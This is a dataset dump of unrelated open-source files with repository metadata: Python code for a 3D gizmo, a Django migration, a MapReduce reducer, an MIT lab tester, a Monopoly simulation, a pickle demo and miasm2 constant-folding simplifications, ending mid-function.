84d71f1f5560207ca8096b3bbfb319bf81a79200
|
[] |
no_license
|
Water-Mngr/CVServer
|
f9d4a2473709787f35142926ba42a2fbd55b2648
|
d48222522c7d3ed251d9c63b4b8d29b01f971b8d
|
refs/heads/main
| 2023-06-03T08:30:56.586145
| 2021-06-20T08:06:16
| 2021-06-20T08:06:16
| 364,805,195
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 221
|
py
|
'''
Copyrights: ©2021 @Laffery
Date: 2021-05-07 17:16:24
LastEditor: Laffery
LastEditTime: 2021-06-18 22:05:04
'''
from .plant_crawler import *
from .plant_id import *
from .plant_cmp import *
from .plant_detect import *
|
[
"2387065420@qq.com"
] |
2387065420@qq.com
|
8ea5c0acb54867b4efc85d696f026abfeabbdb9b
|
b8120566b4ad58944251f5c916f1f57b426b2c58
|
/Test_Cases/test_RecieveSample.py
|
7fb3988e6e735b68059e198fe4cb361d3c7013d4
|
[] |
no_license
|
mrasadali/guruLIS
|
e73fd5191e2063f8c28b70a8ef5c7f2f2e779821
|
3d1dd2250aeb2ddbec31f4cd9eb15ef8219edcb3
|
refs/heads/main
| 2023-06-18T21:39:52.240283
| 2021-07-09T13:17:13
| 2021-07-09T13:17:13
| 354,773,916
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 663
|
py
|
import time
from Page_Object.Recieve_Sample import RecieveSample
from Utilities.BaseClass import BaseClass
class TestCase1(BaseClass):
def test_case3(self):
self.login()
self.driver.get("https://mla-test.azurewebsites.net/Pages/Appointment/CollectedLabSampleReceiving.aspx")
recieve_sample = RecieveSample(self.driver)
# recieve_sample.get_search_specimen()
# # time.sleep(3)
#
# recieve_sample.get_patient_name()
# recieve_sample.get_search_button()
# recieve_sample.get_print_sample()
check = recieve_sample.get_specimen_recieved()
print(check)
time.sleep(5)
|
[
"asadkhaniuk@gmail.com"
] |
asadkhaniuk@gmail.com
|
a91471492905dfdec33fc5bedbecb0181011961d
|
1cd0b84f060c80aba83358d7b5776544d68a08c3
|
/src/core/helpers/trnsf_gizmo/translate.py
|
e773246af9dcc3d437886e5430a355cc70b5809a
|
[] |
no_license
|
leotada/panda3dstudio
|
b480c87f9289fba1ae3a1f7ce7b1efa1d84e879f
|
a5a0890626eb87c1ab8e8ea3442cccbf64c94650
|
refs/heads/master
| 2020-03-20T07:18:24.269859
| 2018-06-13T11:26:15
| 2018-06-13T11:26:15
| 137,277,749
| 0
| 0
| null | 2018-06-13T22:21:15
| 2018-06-13T22:21:15
| null |
UTF-8
|
Python
| false
| false
| 14,687
|
py
|
from .base import *
class TranslationGizmo(TransformationGizmo):
def _create_handles(self):
root = Mgr.get("transf_gizmo_root")
self._origin = root.attach_new_node("translation_gizmo")
self._handle_root = self._origin.attach_new_node("handle_root")
red = VBase4(.7, 0., 0., 1.)
green = VBase4(0., .7, 0., 1.)
blue = VBase4(0., 0., .7, 1.)
grey = VBase4(.5, .5, .5, 1.)
self._axis_colors = {"x": red, "y": green, "z": blue, "screen": grey}
pickable_type_id = PickableTypes.get_id("transf_gizmo")
# Create single-axis handles
for i, axis in enumerate("xyz"):
color_id = self.get_next_picking_color_id()
color_vec = get_color_vec(color_id, pickable_type_id)
self._handle_names[color_id] = axis
pos1 = Point3()
pos1[i] = .04
pos2 = Point3()
pos2[i] = .16
handle = self.__create_axis_handle(self._handle_root, color_vec, pos1, pos2,
"{}_axis_handle".format(axis))
color = self._axis_colors[axis]
handle.set_color(color)
self._handles["axes"][axis] = handle
pos = Point3()
pos[i] = .2
axis_vec = Vec3()
axis_vec[i] = 1.
cone_vec = Vec3()
cone_vec[i] = -.05
cone_vec[(i + 1) % 3] = .01
cone, cap = self.__create_axis_arrow(self._handle_root, color_vec, pos, axis_vec,
cone_vec, 6, "{}_axis_arrow".format(axis))
cone.set_color(color)
cap.set_color(color * .5)
# Create double-axis handles
for plane in ("xy", "xz", "yz"):
color_id = self.get_next_picking_color_id()
color_vec = get_color_vec(color_id, pickable_type_id)
self._handle_names[color_id] = plane
index1 = "xyz".index(plane[0])
index2 = "xyz".index(plane[1])
pos1 = Point3()
pos2 = Point3()
pos3 = Point3()
pos1[index1] = pos2[index1] = pos2[index2] = pos3[index2] = .07
handle, quad = self.__create_plane_handle(self._handle_root, color_vec, pos1, pos2, pos3,
"{}_plane_handle".format(plane))
self._handles["planes"][plane] = handle
self._handles["quads"][plane] = quad
handle[0].set_color(self._axis_colors[plane[0]])
handle[1].set_color(self._axis_colors[plane[1]])
# Create screen handle
color_id = self.get_next_picking_color_id()
color_vec = get_color_vec(color_id, pickable_type_id)
self._handle_names[color_id] = "screen"
handle = self.__create_screen_handle(self._origin, color_vec, .03, "screen_handle")
self._handles["planes"]["screen"] = handle
handle.set_color(grey)
def __create_axis_handle(self, parent, color, pos1, pos2, node_name):
vertex_format = GeomVertexFormat.get_v3cp()
vertex_data = GeomVertexData("axis_line_data", vertex_format, Geom.UH_static)
pos_writer = GeomVertexWriter(vertex_data, "vertex")
pos_writer.add_data3f(pos1)
pos_writer.add_data3f(pos2)
col_writer = GeomVertexWriter(vertex_data, "color")
col_writer.add_data4f(color)
col_writer.add_data4f(color)
lines = GeomLines(Geom.UH_static)
lines.add_vertices(0, 1)
lines_geom = Geom(vertex_data)
lines_geom.add_primitive(lines)
lines_node = GeomNode(node_name)
lines_node.add_geom(lines_geom)
return parent.attach_new_node(lines_node)
def __create_axis_arrow(self, parent, color, pos, axis_vec, cone_vec, segments, node_name):
# Create the arrow cone
vertex_format = GeomVertexFormat.get_v3cp()
vertex_data = GeomVertexData("axis_arrow_data", vertex_format, Geom.UH_static)
pos_writer = GeomVertexWriter(vertex_data, "vertex")
col_writer = GeomVertexWriter(vertex_data, "color")
pos_writer.add_data3f(pos)
col_writer.add_data4f(color)
angle = 360. / segments
quat = Quat()
points = []
for i in xrange(segments):
quat.set_from_axis_angle(angle * i, axis_vec)
points.append(pos + quat.xform(cone_vec))
for point in points:
pos_writer.add_data3f(point)
col_writer.add_data4f(color)
cone = GeomTriangles(Geom.UH_static)
indexes = xrange(1, segments + 1)
for i in indexes:
cone.add_vertices(0, i, indexes[i % segments])
cone_geom = Geom(vertex_data)
cone_geom.add_primitive(cone)
cone_node = GeomNode(node_name)
cone_node.add_geom(cone_geom)
cone_np = parent.attach_new_node(cone_node)
# Create the cap of the arrow cone
vertex_data = GeomVertexData("axis_arrow_data", vertex_format, Geom.UH_static)
pos_writer = GeomVertexWriter(vertex_data, "vertex")
col_writer = GeomVertexWriter(vertex_data, "color")
for point in points:
pos_writer.add_data3f(point)
col_writer.add_data4f(color)
cap = GeomTriangles(Geom.UH_static)
for i in xrange(1, segments - 1):
cap.add_vertices(0, i + 1, i)
cap_geom = Geom(vertex_data)
cap_geom.add_primitive(cap)
cap_node = GeomNode(node_name)
cap_node.add_geom(cap_geom)
cap_np = parent.attach_new_node(cap_node)
return cone_np, cap_np
def __create_plane_handle(self, parent, color, pos1, pos2, pos3, node_name):
vertex_format = GeomVertexFormat.get_v3cp()
def create_line(pos1, pos2):
vertex_data = GeomVertexData("axes_plane_data", vertex_format, Geom.UH_static)
pos_writer = GeomVertexWriter(vertex_data, "vertex")
col_writer = GeomVertexWriter(vertex_data, "color")
pos_writer.add_data3f(pos1)
col_writer.add_data4f(color)
pos_writer.add_data3f(pos2)
col_writer.add_data4f(color)
lines = GeomLines(Geom.UH_static)
lines.add_vertices(0, 1)
lines_geom = Geom(vertex_data)
lines_geom.add_primitive(lines)
lines_node = GeomNode(node_name)
lines_node.add_geom(lines_geom)
return lines_node
line1_np = parent.attach_new_node(create_line(pos1, pos2))
line2_np = parent.attach_new_node(create_line(pos2, pos3))
# Create quad
vertex_data = GeomVertexData("axes_quad_data", vertex_format, Geom.UH_static)
pos_writer = GeomVertexWriter(vertex_data, "vertex")
for pos in (Point3(), pos1, pos2, pos3):
pos_writer.add_data3f(pos)
tris = GeomTriangles(Geom.UH_static)
tris.add_vertices(0, 1, 2)
tris.add_vertices(2, 3, 0)
quad_geom = Geom(vertex_data)
quad_geom.add_primitive(tris)
quad_node = GeomNode("plane_quad")
quad_node.add_geom(quad_geom)
quad_np = parent.attach_new_node(quad_node)
quad_np.set_two_sided(True)
quad_np.set_transparency(TransparencyAttrib.M_alpha)
quad_np.hide(self._picking_mask)
return (line1_np, line2_np), quad_np
def __create_screen_handle(self, parent, color, size, node_name):
vertex_format = GeomVertexFormat.get_v3cp()
vertex_data = GeomVertexData("screen_handle_data", vertex_format, Geom.UH_static)
pos_writer = GeomVertexWriter(vertex_data, "vertex")
col_writer = GeomVertexWriter(vertex_data, "color")
coord = size * .5
for x, z in ((-coord, -coord), (-coord, coord), (coord, coord), (coord, -coord)):
pos = VBase3(x, 0., z)
pos_writer.add_data3f(pos)
col_writer.add_data4f(color)
square = GeomLines(Geom.UH_static)
for i in range(4):
square.add_vertices(i, (i + 1) % 4)
square_geom = Geom(vertex_data)
square_geom.add_primitive(square)
square_node = GeomNode(node_name)
square_node.add_geom(square_geom)
square_np = parent.attach_new_node(square_node)
square_np.set_billboard_point_eye()
square_np.set_bin("fixed", 100)
square_np.set_depth_test(False)
return square_np
def hilite_handle(self, color_id):
if color_id not in self._handle_names:
return
hilited_handles = []
handle_name = self._handle_names[color_id]
if handle_name == "screen":
hilited_handles.append("screen")
else:
for axis in handle_name:
hilited_handles.append(axis)
if handle_name in self._handles["planes"]:
hilited_handles.append(handle_name)
self._handles["quads"][handle_name].show()
if self._hilited_handles != hilited_handles:
self.remove_hilite()
self._hilited_handles = hilited_handles
cyan = VBase4(0., 1., 1., 1.)
cyan_alpha = VBase4(0., 1., 1., .25)
for handle_name in hilited_handles:
if handle_name in self._handles["planes"]:
handle = self._handles["planes"][handle_name]
if handle_name == "screen":
handle.set_color(cyan)
else:
handle[0].set_color(cyan)
handle[1].set_color(cyan)
self._handles["quads"][handle_name].set_color(cyan_alpha)
else:
self._handles["axes"][handle_name].set_color(cyan)
def remove_hilite(self):
if self._hilited_handles:
yellow = VBase4(1., 1., 0., 1.)
yellow_alpha = VBase4(1., 1., 0., .25)
for plane in self._handles["quads"]:
if plane == self._selected_axes:
self._handles["quads"][plane].set_color(yellow_alpha)
self._handles["quads"][plane].show()
else:
self._handles["quads"][plane].hide()
for handle_name in self._hilited_handles:
if handle_name == "screen":
if handle_name == self._selected_axes:
color = yellow
else:
color = self._axis_colors[handle_name]
self._handles["planes"][handle_name].set_color(color)
elif handle_name in self._handles["planes"]:
if handle_name == self._selected_axes:
color1 = color2 = yellow
else:
color1 = self._axis_colors[handle_name[0]]
color2 = self._axis_colors[handle_name[1]]
handle = self._handles["planes"][handle_name]
handle[0].set_color(color1)
handle[1].set_color(color2)
else:
if handle_name in self._selected_axes:
color = yellow
else:
color = self._axis_colors[handle_name]
self._handles["axes"][handle_name].set_color(color)
self._hilited_handles = []
def select_handle(self, color_id):
if color_id not in self._handle_names:
return
axes = self._handle_names[color_id]
Mgr.update_app("axis_constraints", "translate", axes)
def set_active_axes(self, axes):
self._selected_axes = axes
self.remove_hilite()
yellow = VBase4(1., 1., 0., 1.)
yellow_alpha = VBase4(1., 1., 0., .25)
for axis in "xyz":
if axis in axes:
self._handles["axes"][axis].set_color(yellow)
else:
self._handles["axes"][axis].set_color(self._axis_colors[axis])
for plane in self._handles["planes"]:
if plane == "screen":
handle = self._handles["planes"][plane]
handle.set_color(yellow if plane == axes else self._axis_colors[plane])
else:
quad = self._handles["quads"][plane]
quad.set_color(yellow_alpha)
if plane == axes:
handle = self._handles["planes"][plane]
handle[0].set_color(yellow)
handle[1].set_color(yellow)
quad.show()
else:
handle = self._handles["planes"][plane]
handle[0].set_color(self._axis_colors[plane[0]])
handle[1].set_color(self._axis_colors[plane[1]])
quad.hide()
def get_point_at_screen_pos(self, screen_pos):
cam = self.cam()
point1 = Mgr.get("transf_gizmo_world_pos")
if self._selected_axes == "screen":
normal = self.world.get_relative_vector(cam, Vec3.forward())
plane = Plane(normal, point1)
else:
if len(self._selected_axes) == 2:
axis_vec = Vec3()
axis_vec["xyz".index(self._selected_axes[0])] = 1.
axis_vec = V3D(self.world.get_relative_vector(self._handle_root, axis_vec))
point2 = point1 + axis_vec
axis_vec = Vec3()
axis_vec["xyz".index(self._selected_axes[1])] = 1.
axis_vec = V3D(self.world.get_relative_vector(self._handle_root, axis_vec))
point3 = point1 + axis_vec
else:
axis_vec = Vec3()
axis_vec["xyz".index(self._selected_axes)] = 1.
axis_vec = V3D(self.world.get_relative_vector(self._handle_root, axis_vec))
cam_vec = V3D(self.world.get_relative_vector(cam, Vec3.forward()))
cross_vec = axis_vec ** cam_vec
if not cross_vec.normalize():
return point1
point2 = point1 + axis_vec
point3 = point1 + cross_vec
plane = Plane(point1, point2, point3)
near_point = Point3()
far_point = Point3()
self.cam.lens.extrude(screen_pos, near_point, far_point)
rel_pt = lambda point: self.world.get_relative_point(cam, point)
intersection_point = Point3()
if not plane.intersects_line(intersection_point, rel_pt(near_point), rel_pt(far_point)):
return
return intersection_point
|
[
"Epihaius@users.noreply.github.com"
] |
Epihaius@users.noreply.github.com
|
ce49c0b233425ec0f195e7edd7871fec58b159d6
|
808905832b0eedfd14ac719fd59b911636c94eb9
|
/app/migrations/0001_initial.py
|
8d24ab1292ccf833ace414f2698c8ae4219cf3ed
|
[] |
no_license
|
hikaru4215/cosme-portfolio
|
27aef4fcdc410d0df5de22fe96729d810672233c
|
d4f5927631aa44df4dca74a2d73ff293025871d9
|
refs/heads/main
| 2023-03-24T23:34:58.334680
| 2021-03-21T13:44:14
| 2021-03-21T13:44:14
| 349,323,618
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,139
|
py
|
# Generated by Django 2.2.19 on 2021-03-19 08:20
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50, verbose_name='カテゴリ')),
],
),
migrations.CreateModel(
name='Price',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('price', models.CharField(max_length=50, verbose_name='プライス')),
],
),
migrations.CreateModel(
name='Score',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('scores', models.CharField(max_length=50, verbose_name='おすすめ度')),
],
),
]
|
[
"hikaru4215hkr2178ay@yahoo.co.jp"
] |
hikaru4215hkr2178ay@yahoo.co.jp
|
6d8380f28efb8e4e51f189e61b0814a61df18843
|
aad8db2013579bac732a3c650c7a0f7df15e4c21
|
/Week14/Karl_Roth_reducer.py
|
92ff1b3716c7c552fe03b17455d2c707c3ef9e9a
|
[] |
no_license
|
nrothchicago/DataScience
|
1c8756d38c6fdf001f7c0692d11915465c9675d8
|
174fc78b10ea1751f5f86da5b0885875d33d29f2
|
refs/heads/master
| 2021-06-21T04:30:52.053432
| 2017-07-17T15:02:28
| 2017-07-17T15:02:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 921
|
py
|
#!/usr/bin/env python3
import sys
# We explicitly define the word/count separator token.
sep = '\t'
# We open STDIN and STDOUT
with sys.stdin as fin:
with sys.stdout as fout:
# Keep track of current city and count
ccity = None
ccount = 0
city = None
# For every line in STDIN
for line in fin:
# Split word into city and count, based on
# predefined separator token.
city, scount = line.split('\t', 1)
# Assume count is always an integer
count = int(scount)
# city is either repeated or new
if ccity == city:
ccount += count
else:
# We have to handle the first city explicitly
if ccity != None:
fout.write("{0:s}{1:s}{2:d}\n".format(ccity, sep, ccount))
# New city, so reset variables
ccity = city
ccount = count
else:
# Output final word count
if ccity == city:
fout.write("{0:s}{1:s}{2:d}\n".format(city, sep, ccount))
|
[
"karoth14@gmail.com"
] |
karoth14@gmail.com
|
9824cb548ab42610e212efea7d1ab5ed82095248
|
01ff60b36061d6905951f815502945c4373715b7
|
/serializar_objetos.py
|
66275cdfe9b06a2f8a7649a7f152f7cd533a048d
|
[] |
no_license
|
solcra/pythonEstudio
|
84b6d15f395b71ec5ae5ca5398f1638fb29f656f
|
34408722377c35012dd937ea17a197f5ce622b3c
|
refs/heads/main
| 2022-12-29T11:57:45.449151
| 2020-10-11T01:57:32
| 2020-10-11T01:57:32
| 302,904,463
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 863
|
py
|
import pickle
class Vehiculos():
def __init__(self, marca, modelo):
self.marca=marca
self.modelo=modelo
self.enmarcha=False
self.acelera=False
self.frena=False
def arrancar(self):
self.enmarcha=True
def acelerar(self):
self.acelera=True
def frenar(self):
self.frena=True
def estado(self):
print("Marca: ",self.marca, "\nModelo: ", self.modelo, "\nEn marcha: ",self.enmarcha, "\nAcelera: ", self.acelera, "\nFrenado: ", self.frena)
coche1 =Vehiculos("Mazda", "MX5")
coche2 =Vehiculos("Seat", "Leon")
coche3 =Vehiculos("Renault", "Megane")
coches=[coche1, coche2, coche3]
fichero=open("losCoches","wb")
pickle.dump(coches, fichero)
fichero.close()
del (fichero)
ficheroApertura = open("losCoches","rb")
misCoches=pickle.load(ficheroApertura)
ficheroApertura.close()
for c in misCoches:
c.estado()
|
[
"carlosgranadacra@gmai.com"
] |
carlosgranadacra@gmai.com
|
dfe5424bd34a26902cf8464f56f024f2e864b554
|
e763c08677250bfbeaa444910d052560a0c6835f
|
/lab0/tester.py
|
7d791f5f1a04d70b19056ff399207cf056a04236
|
[] |
no_license
|
Lenaxiao/MIT-6.034-lab-works
|
bd72bfd069413e7eb7aa9baf8c41077b4f9bbaf5
|
363cebf9cd9b8b2ef3d29863875fdf626929a803
|
refs/heads/master
| 2022-11-06T18:39:21.173564
| 2020-06-17T20:01:21
| 2020-06-17T20:01:21
| 273,063,358
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,218
|
py
|
import xmlrpclib
import traceback
import sys
import os
import tarfile
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
# This is a skeleton for what the tester should do. Ideally, this module
# would be imported in the pset and run as its main function.
# We need the following rpc functions. (They generally take username and
# password, but you could adjust this for whatever security system.)
#
# tester.submit_code(username, password, pset, studentcode)
# 'pset' is a string such as 'ps0'. studentcode is a string containing
# the contents of the corresponding file, ps0.py. This stores the code on
# the server so we can check it later for cheating, and is a prerequisite
# to the tester returning a grade.
#
# tester.get_tests(pset)
# returns a list of tuples of the form (INDEX, TYPE, NAME, ARGS):
# INDEX is a unique integer that identifies the test.
# TYPE should be one of either 'VALUE' or 'FUNCTION'.
# If TYPE is 'VALUE', ARGS is ignored, and NAME is the name of a
# variable to return for this test. The variable must be an attribute
# of the lab module.
# If TYPE is 'FUNCTION', NAME is the name of a function in the lab module
# whose return value should be the answer to this test, and ARGS is a
# tuple containing arguments for the function.
#
# tester.send_answer(username, password, pset, index, answer)
# Sends <answer> as the answer to test case <index> (0-numbered) in the pset
# named <pset>. Returns whether the answer was correct, and an expected
# value.
#
# tester.status(username, password, pset)
# A string that includes the official score for this user on this pset.
# If a part is missing (like the code), it should say so.
# Because I haven't written anything on the server side, test_online has never
# been tested.
def test_summary(dispindex, ntests):
return "Test %d/%d" % (dispindex, ntests)
def show_result(testsummary, testcode, correct, got, expected, verbosity):
if correct:
if verbosity > 0:
print("%s: Correct." % testsummary)
if verbosity > 1:
print('\t', testcode)
print()
else:
print("%s: Incorrect." % testsummary)
print('\t', testcode)
print("Got: ", got)
print("Expected:", expected)
def show_exception(testsummary, testcode):
print ("%s: Error." % testsummary)
print("While running the following test case:")
print('\t', testcode)
print("Your code encountered the following error:")
traceback.print_exc()
print
def get_lab_module():
lab = None
# Try the easy way first
try:
from tests import lab_number
lab = __import__('lab%s' % lab_number)
except ImportError:
pass
for labnum in xrange(6):
try:
lab = __import__('lab%s' % labnum)
except ImportError:
pass
if lab == None:
raise ImportError(
"Cannot find your lab; or, error importing it. Try loading it by running 'python labN.py' (for the appropriate value of 'N').")
if not hasattr(lab, "LAB_NUMBER"):
lab.LAB_NUMBER = labnum
return lab
def run_test(test, lab):
id, type, attr_name, args = test
attr = getattr(lab, attr_name)
if type == 'VALUE':
return attr
elif type == 'FUNCTION':
return apply(attr, args)
else:
raise Exception(
"Test Error: Unknown TYPE '%s'. Please make sure you have downloaded the latest version of the tester script. If you continue to see this error, contact a TA.")
def test_offline(verbosity=1):
import tests as tests_module
test_names = list(tests_module.__dict__.keys())
test_names.sort()
tests = [(x[:-8],
getattr(tests_module, x),
getattr(tests_module, "%s_testanswer" % x[:-8]),
getattr(tests_module, "%s_expected" % x[:-8]),
"_".join(x[:-8].split('_')[:-1]))
for x in test_names if x[-8:] == "_getargs"]
ntests = len(tests)
ncorrect = 0
for index, (testname, getargs, testanswer, expected, fn_name) in enumerate(tests):
dispindex = index+1
summary = test_summary(dispindex, ntests)
if getargs == 'VALUE':
type = 'VALUE'
def getargs(): return getattr(get_lab_module(), testname)
fn_name = testname
else:
type = 'FUNCTION'
try:
answer = run_test((0, type, fn_name, getargs()), get_lab_module())
correct = testanswer(answer)
except Exception:
show_exception(summary, testname)
continue
show_result(summary, testname, correct, answer, expected, verbosity)
if correct:
ncorrect += 1
print("Passed %d of %d tests." % (ncorrect, ntests))
return ncorrect == ntests
def get_target_upload_filedir():
# Get current directory. Play nice with Unicode pathnames, just in case.
cwd = os.getcwd()
print("Please specify the directory containing your lab.")
print("Note that all files from this directory will be uploaded!")
print("Labs should not contain large amounts of data; very-large")
print("files will fail to upload.")
print()
print("The default path is '%s'" % cwd)
target_dir = raw_input("[%s] >>> " % cwd)
target_dir = target_dir.strip()
if target_dir == '':
target_dir = cwd
print("Ok, using '%s'." % target_dir)
return target_dir
def get_tarball_data(target_dir, filename):
data = StringIO()
file = tarfile.open(filename, "w|bz2", data)
print("Preparing the lab directory for transmission...")
file.add(target_dir)
print("Done.")
print()
print("The following files have been added:")
for f in file.getmembers():
print(f.name)
file.close()
return data.getvalue()
def test_online(verbosity=1):
lab = get_lab_module()
try:
server = xmlrpclib.Server(server_url, allow_none=True)
tests = server.get_tests(username, password, lab.__name__)
except NotImplementedError:
print("Your version of Python doesn't seem to support HTTPS, for")
print("secure test submission. Would you like to downgrade to HTTP?")
print("(note that this could theoretically allow a hacker with access")
print("to your local network to find your 6.034 password)")
answer = raw_input("(Y/n) >>> ")
if len(answer) == 0 or answer[0] in "Yy":
server = xmlrpclib.Server(server_url.replace("https", "http"))
tests = server.get_tests(username, password, lab.__name__)
else:
print("Ok, not running your tests.")
print("Please try again on another computer.")
print("Linux Athena computers are known to support HTTPS,")
print("if you use the version of Python in the 'python' locker.")
sys.exit(0)
ntests = len(tests)
ncorrect = 0
lab = get_lab_module()
target_dir = get_target_upload_filedir()
tarball_data = get_tarball_data(
target_dir, "lab%s.tar.bz2" % lab.LAB_NUMBER)
print("Submitting to the 6.034 Webserver...")
server.submit_code(username, password, lab.__name__,
xmlrpclib.Binary(tarball_data))
print("Done submitting code.")
print("Running test cases...")
for index, testcode in enumerate(tests):
dispindex = index+1
summary = test_summary(dispindex, ntests)
try:
answer = run_test(testcode, get_lab_module())
except Exception:
show_exception(summary, testcode)
continue
correct, expected = server.send_answer(
username, password, lab.__name__, testcode[0], answer)
show_result(summary, testcode, correct, answer, expected, verbosity)
if correct:
ncorrect += 1
response = server.status(username, password, lab.__name__)
print(response)
print("!! Please note that lab0 has no sever-side test cases.")
print("You receive a 5 if you submit on-time.")
if __name__ == '__main__':
test_offline()
|
[
"lenaxiao@uw.edu"
] |
lenaxiao@uw.edu
|
1dd692e32515fcb5842ba4dd942c7dd8e4e5de2c
|
3fcbbc1a2a262ed3b8fc9d7183c81b5f09445a85
|
/build/viso2/viso2_ros/catkin_generated/pkg.installspace.context.pc.py
|
3fd63f6aa6f66b7565c6857a53f863aa9b1bcc6e
|
[] |
no_license
|
karry3775/SimulationWS
|
0861071c7d1b0f0372dc3515983bf8e092b37d07
|
754336d88d40e8e7d9e677bedff37505df7eaf4d
|
refs/heads/master
| 2021-05-24T12:01:15.763154
| 2020-04-16T02:33:22
| 2020-04-16T02:33:22
| 253,547,979
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 426
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include".split(';') if "${prefix}/include" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "viso2_ros"
PROJECT_SPACE_DIR = "/home/kartik/Documents/gazebo_practice_ws/install"
PROJECT_VERSION = "0.0.1"
|
[
"kartikprakash3775@gmail.com"
] |
kartikprakash3775@gmail.com
|
40ed3a558af52564d435481fd28bd07e931e359a
|
4181c8a6f54a4dd04587a9872962c48919796226
|
/monopoly/game.py
|
9a32135ac69ea9e64c2bbe769f3cdceb6406ac90
|
[
"MIT"
] |
permissive
|
abhishekmodak/monopoly
|
ab075a9ba5103d2c59b205053002f7226dd15b7b
|
cbb341ce2a37ed86e0d77531692df77b8947ff86
|
refs/heads/master
| 2020-07-20T06:54:18.286041
| 2019-09-05T15:25:27
| 2019-09-05T15:25:27
| 206,593,936
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,826
|
py
|
from cells import *
from player import Player
class Game:
def __init__(self):
self.count_of_players = 3
self.cell_positions = ['E', 'E', 'J', 'H', 'E', 'T', 'J', 'T', 'E', 'E', 'H', 'J', 'T', 'H', 'E',\
'E', 'J', 'H', 'E', 'T', 'J', 'T', 'E', 'E', 'H', 'J', 'T', 'H', 'J',\
'E', 'E', 'J', 'H', 'E', 'T', 'J', 'T', 'E', 'E', 'H', 'J', 'T', 'E', 'H', 'E']
self.dice_output = [4, 4, 4, 6, 7, 8, 5, 11, 10, 12, 2, 3, 5, 6, 7, 8, 5, 11, 10, 12, 2, 3, 5, 6, 7, 8, 5, 11, 10, 12, 2, 3, 5, 6, 7, 8, 5, 11, 10, 12]
self.game()
def create_obj(self):
self.players = []
for i in range(self.count_of_players):
self.players.append(Player())
self.hotels = {}
for num, item in enumerate(self.cell_positions):
if item == "H":
self.hotels.update({num: Hotel(num)})
self.j1 = Jail()
self.t1 = Treasure()
def declare_winners(self):
for player in self.players:
print(player.remaining_amount)
def calc_price(self, player, position):
if position == 'J':
self.j1.deduct_fine(player)
elif position == 'T':
self.t1.give_rewards(player)
elif position == 'H':
self.hotels[player.position].check_transaction
def calc_position(self, player, item):
player.position +=item
player.position = player.position % len(self.cell_positions)
position = self.cell_positions[player.position]
self.calc_price(player, position)
def game(self):
self.create_obj()
for num, item in enumerate(self.dice_output):
self.calc_position(self.players[num%3], item)
self.declare_winners()
game = Game()
|
[
"amodak828@gmail.com"
] |
amodak828@gmail.com
|
6eb5e4b7dcbd788da2b0eda5a5822547df006bf1
|
a969bd5473ae0e7024e9512a7eafbc2b19cebbbf
|
/miasm2/expression/simplifications_common.py
|
13b25ce20fc95402c857f08e4b0d5c716f526779
|
[] |
no_license
|
buptsseGJ/VulSeeker
|
18c83b7008e41f8f4337c94eecdf365b0cc29dd7
|
b71431045339a2e031950d2f8d99bfce30a44e99
|
refs/heads/master
| 2021-06-27T17:44:44.374702
| 2018-12-25T13:21:59
| 2018-12-25T13:21:59
| 135,588,405
| 97
| 33
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 22,526
|
py
|
# ----------------------------- #
# Common simplifications passes #
# ----------------------------- #
from miasm2.expression.modint import mod_size2int, mod_size2uint
from miasm2.expression.expression import ExprInt, ExprSlice, ExprMem, ExprCond, ExprOp, ExprCompose
from miasm2.expression.expression_helper import parity, op_propag_cst, merge_sliceto_slice
def simp_cst_propagation(e_s, expr):
"""This passe includes:
- Constant folding
- Common logical identities
- Common binary identities
"""
# merge associatif op
args = list(expr.args)
op_name = expr.op
# simpl integer manip
# int OP int => int
# TODO: <<< >>> << >> are architecture dependant
if op_name in op_propag_cst:
while (len(args) >= 2 and
args[-1].is_int() and
args[-2].is_int()):
int2 = args.pop()
int1 = args.pop()
if op_name == '+':
out = int1.arg + int2.arg
elif op_name == '*':
out = int1.arg * int2.arg
elif op_name == '**':
out =int1.arg ** int2.arg
elif op_name == '^':
out = int1.arg ^ int2.arg
elif op_name == '&':
out = int1.arg & int2.arg
elif op_name == '|':
out = int1.arg | int2.arg
elif op_name == '>>':
if int(int2) > int1.size:
out = 0
else:
out = int1.arg >> int2.arg
elif op_name == '<<':
if int(int2) > int1.size:
out = 0
else:
out = int1.arg << int2.arg
elif op_name == 'a>>':
tmp1 = mod_size2int[int1.arg.size](int1.arg)
tmp2 = mod_size2uint[int2.arg.size](int2.arg)
if tmp2 > int1.size:
is_signed = int(int1) & (1 << (int1.size - 1))
if is_signed:
out = -1
else:
out = 0
else:
out = mod_size2uint[int1.arg.size](tmp1 >> tmp2)
elif op_name == '>>>':
shifter = int2.arg % int2.size
out = (int1.arg >> shifter) | (int1.arg << (int2.size - shifter))
elif op_name == '<<<':
shifter = int2.arg % int2.size
out = (int1.arg << shifter) | (int1.arg >> (int2.size - shifter))
elif op_name == '/':
out = int1.arg / int2.arg
elif op_name == '%':
out = int1.arg % int2.arg
elif op_name == 'idiv':
assert int2.arg.arg
tmp1 = mod_size2int[int1.arg.size](int1.arg)
tmp2 = mod_size2int[int2.arg.size](int2.arg)
out = mod_size2uint[int1.arg.size](tmp1 / tmp2)
elif op_name == 'imod':
assert int2.arg.arg
tmp1 = mod_size2int[int1.arg.size](int1.arg)
tmp2 = mod_size2int[int2.arg.size](int2.arg)
out = mod_size2uint[int1.arg.size](tmp1 % tmp2)
